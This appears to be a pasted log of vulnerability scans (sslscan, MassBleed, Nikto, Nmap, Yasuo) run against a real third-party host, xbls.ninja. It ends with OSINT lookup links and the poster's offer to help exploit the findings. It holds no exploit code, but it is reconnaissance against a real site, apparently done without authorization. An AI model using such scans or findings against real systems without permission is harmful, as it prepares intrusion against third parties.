- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-ECDSA-CHACHA20-POLY1305 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA384 Curve P-256 DHE 256
- Preferred TLSv1.1 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- Preferred TLSv1.0 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- SSL Certificate:
- Signature Algorithm: ecdsa-with-SHA256
- Subject: sni87911.cloudflaressl.com
- Altnames: DNS:sni87911.cloudflaressl.com, DNS:*.anhaniuso.top, DNS:*.bit.cm, DNS:*.charlottestowels.xyz, DNS:*.daypeada.top, DNS:*.dedinow.com, DNS:*.digitalgiftcodes.com, DNS:*.digitalpaymentgateway.com, DNS:*.giofalco.com, DNS:*.ideal-2vh3g.ga, DNS:*.landsdownefootandankle.com, DNS:*.learnlsp.com, DNS:*.lsp.academy, DNS:*.michaelfearne.com, DNS:*.nanovds.com, DNS:*.pro-palo.ru, DNS:*.scoresbuch.cf, DNS:*.summitvillegoodshopping.ga, DNS:*.swell-fstf8.ml, DNS:*.todaysfamilymagazine.com, DNS:*.txtbattle.ru, DNS:*.usadba-nsk.ru, DNS:*.xbls.ninja, DNS:*.xblsyndicate.ninja, DNS:anhaniuso.top, DNS:bit.cm, DNS:charlottestowels.xyz, DNS:daypeada.top, DNS:dedinow.com, DNS:digitalgiftcodes.com, DNS:digitalpaymentgateway.com, DNS:giofalco.com, DNS:ideal-2vh3g.ga, DNS:landsdownefootandankle.com, DNS:learnlsp.com, DNS:lsp.academy, DNS:michaelfearne.com, DNS:nanovds.com, DNS:pro-palo.ru, DNS:scoresbuch.cf, DNS:summitvillegoodshopping.ga, DNS:swell-fstf8.ml, DNS:todaysfamilymagazine.com, DNS:txtbattle.ru, DNS:usadba-nsk.ru, DNS:xbls.ninja, DNS:xblsyndicate.ninja
- Issuer: COMODO ECC Domain Validation Secure Server CA 2
- Not valid before: Jul 6 00:00:00 2017 GMT
- Not valid after: Jan 12 23:59:59 2018 GMT
- AVAILABLE PLUGINS
- -----------------
- PluginCertInfo
- PluginSessionRenegotiation
- PluginHSTS
- PluginChromeSha1Deprecation
- PluginOpenSSLCipherSuites
- PluginCompression
- PluginSessionResumption
- PluginHeartbleed
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- xbls.ninja:8443 => 104.27.135.184:8443
- SCAN RESULTS FOR XBLS.NINJA:8443 - 104.27.135.184:8443
- ------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: abfb344f0354964ab4e2a0473d42e02e23acd61d
- Common Name: sni87911.cloudflaressl.com
- Issuer: COMODO ECC Domain Validation Secure Server CA 2
- Serial Number: CFF571D4DF39A468DFCA6E198BAE1FA7
- Not Before: Jul 6 00:00:00 2017 GMT
- Not After: Jan 12 23:59:59 2018 GMT
- Signature Algorithm: ecdsa-with-SHA256
- Public Key Algorithm: id-ecPublicKey
- Key Size: 256 bit
- X509v3 Subject Alternative Name: {'DNS': ['sni87911.cloudflaressl.com', '*.anhaniuso.top', '*.bit.cm', '*.charlottestowels.xyz', '*.daypeada.top', '*.dedinow.com', '*.digitalgiftcodes.com', '*.digitalpaymentgateway.com', '*.giofalco.com', '*.ideal-2vh3g.ga', '*.landsdownefootandankle.com', '*.learnlsp.com', '*.lsp.academy', '*.michaelfearne.com', '*.nanovds.com', '*.pro-palo.ru', '*.scoresbuch.cf', '*.summitvillegoodshopping.ga', '*.swell-fstf8.ml', '*.todaysfamilymagazine.com', '*.txtbattle.ru', '*.usadba-nsk.ru', '*.xbls.ninja', '*.xblsyndicate.ninja', 'anhaniuso.top', 'bit.cm', 'charlottestowels.xyz', 'daypeada.top', 'dedinow.com', 'digitalgiftcodes.com', 'digitalpaymentgateway.com', 'giofalco.com', 'ideal-2vh3g.ga', 'landsdownefootandankle.com', 'learnlsp.com', 'lsp.academy', 'michaelfearne.com', 'nanovds.com', 'pro-palo.ru', 'scoresbuch.cf', 'summitvillegoodshopping.ga', 'swell-fstf8.ml', 'todaysfamilymagazine.com', 'txtbattle.ru', 'usadba-nsk.ru', 'xbls.ninja', 'xblsyndicate.ninja']}
- * Certificate - Trust:
- Hostname Validation: OK - Subject Alternative Name matches
- Google CA Store (09/2015): OK - Certificate is trusted
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Certificate Chain Received: ['sni87911.cloudflaressl.com', 'COMODO ECC Domain Validation Secure Server CA 2', 'COMODO ECC Certification Authority']
- * Certificate - OCSP Stapling:
- OCSP Response Status: successful
- Validation w/ Mozilla's CA Store: OK - Response is trusted
- Responder Id: 40096167F0BC83714FDE12082C6FD4D42B763D96
- Cert Status: good
- Cert Serial Number: CFF571D4DF39A468DFCA6E198BAE1FA7
- This Update: Jul 8 21:50:39 2017 GMT
- Next Update: Jul 15 21:50:39 2017 GMT
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 0.78 S
- ------------------------
- ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
- ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
- ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
- ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
- ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
- ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
- ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
- ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
- ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
- ░ ░
- + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
- + -- --=[Checking for DROWN (SSLv2): 104.27.135.184:8443
- + -- --=[Checking for HeartBleed: 104.27.135.184:8443
- + -- --=[Checking for OpenSSL CCS: 104.27.135.184:8443
- + -- --=[Checking for Poodle (SSLv3): 104.27.135.184:8443
- + -- --=[Checking for WinShock (MS14-066): 104.27.135.184:8443
- Testing if OpenSSL supports the ciphers we are checking for: YES
- Testing 104.27.135.184:8443 for availability of SSL ciphers added in MS14-066...
- Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
- Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
- Testing cipher AES256-GCM-SHA384: UNSUPPORTED
- Testing cipher AES128-GCM-SHA256: UNSUPPORTED
- Checking if target system is running Windows Server 2012 or later...
- Testing cipher ECDHE-RSA-AES256-SHA384: UNSUPPORTED
- Testing cipher ECDHE-RSA-AES256-SHA: UNSUPPORTED
- 104.27.135.184:8443 is patched: NO
- + -- --=[Scan Complete!
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 104.27.135.184
- + Target Hostname: xbls.ninja
- + Target Port: 8443
- ---------------------------------------------------------------------------
- + SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni87911.cloudflaressl.com
- Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305
- Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
- + Start Time: 2017-07-13 08:36:49 (GMT0)
- ---------------------------------------------------------------------------
- + Server: cloudflare-nginx
- + Cookie __cfduid created without the secure flag
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'cf-ray' found, with contents: 37da3bbb6a2086cd-ARN
- + All CGI directories 'found', use '-C none' to test none
- + The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
- + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: SSL negotiation failed: error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure at /var/lib/nikto/plugins/LW2.pm line 5157.
- at /var/lib/nikto/plugins/LW2.pm line 5157.
- ; at /var/lib/nikto/plugins/LW2.pm line 5157.
- + Scan terminated: 20 error(s) and 4 item(s) reported on remote host
- + End Time: 2017-07-13 08:37:16 (GMT0) (27 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-13 08:37 UTC
- Nmap scan report for xbls.ninja (104.27.134.184)
- Host is up (0.023s latency).
- Other addresses for xbls.ninja (not scanned): 104.27.135.184
- PORT STATE SERVICE VERSION
- 8443/tcp open ssl/http Cloudflare nginx
- |_http-server-header: cloudflare-nginx
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose
- Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (93%)
- OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6
- Aggressive OS guesses: Linux 3.12 - 4.4 (93%), Linux 3.18 (88%), Linux 2.6.18 - 2.6.22 (86%), OpenWrt Chaos Calmer (Linux 3.18) (85%), Linux 3.2 (85%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 7 hops
- TRACEROUTE (using port 8443/tcp)
- HOP RTT ADDRESS
- 1 REMOVED FOR MY SECURITY
- 2 REMOVED FOR MY SECURITY
- 3 REMOVED FOR MY SECURITY
- 4 REMOVED FOR MY SECURITY
- 5 REMOVED FOR MY SECURITY
- 6 REMOVED FOR MY SECURITY
- 7 REMOVED FOR MY SECURITY
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 32.22 seconds
- + -- --=[Port 8888 closed... skipping.
- + -- --=[Port 10000 closed... skipping.
- + -- --=[Port 16992 closed... skipping.
- + -- --=[Port 27017 closed... skipping.
- + -- --=[Port 27018 closed... skipping.
- + -- --=[Port 27019 closed... skipping.
- + -- --=[Port 28017 closed... skipping.
- + -- --=[Port 49152 closed... skipping.
- + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
- #########################################################################################
- oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
- `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
- `888. .8' .88888. Y88bo. 888 8 888 888
- `888.8' .8' `888. `ZY8888o. 888 8 888 888
- `888' .88ooo8888. `0Y88b 888 8 888 888
- 888 .8' `888. oo .d8P `88. .8' `88b d88'
- o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
- Welcome to Yasuo v2.3
- Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
- #########################################################################################
- I, [2017-07-13T08:38:20.252828 #4490] INFO -- : Initiating port scan
- I, [2017-07-13T08:39:22.956758 #4490] INFO -- : Using nmap scan output file logs/nmap_output_2017-07-13_08-38-20.xml
- I, [2017-07-13T08:39:22.979180 #4490] INFO -- : Discovered open port: 104.27.135.184:80
- I, [2017-07-13T08:39:23.050717 #4490] INFO -- : Discovered open port: 104.27.135.184:443
- I, [2017-07-13T08:39:23.110770 #4490] INFO -- : Discovered open port: 104.27.135.184:8080
- I, [2017-07-13T08:39:23.181973 #4490] INFO -- : Discovered open port: 104.27.135.184:8443
- W, [2017-07-13T08:39:23.254584 #4490] WARN -- : Yasuo did not find any potential hosts to enumerate
- + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +
- ==================================================
- THE END
- I Canceled Nmap Port Scan (Took too long... xD)
- ==================================================
- =================================================================================
- Some very interesting links....
- https://www.tcpiputils.com/browse/domain/xbls.ninja
- http://toolbar.netcraft.com/site_report?url=xbls.ninja
- https://www.shodan.io/search?query=xbls.ninja\
- https://www.censys.io/ipv4/104.27.135.184
- http://www.hypestat.com/info/xbls.ninja
- https://crt.sh/?q=%25.xbls.ninja
- https://securityheaders.io/?q=xbls.ninja
- https://www.ssllabs.com/ssltest/analyze.html?d=xbls.ninja
- https://securityheaders.io/?q=xbls.ninja
- https://xbls.ninja/xmlrpc.php?rsd
- https://www.google.ca/search?q=site:pastebin.com+xbls.ninja
- https://www.google.ca/search?q=site:linkedin.com+employees+xbls.ninja
- =================================================================================
- You can contact me via Quantizy@Protonmail.ch if you want help exploiting or wanna help me exploit some of these vulnerbilities. =))
Add Comment
Please, Sign In to add comment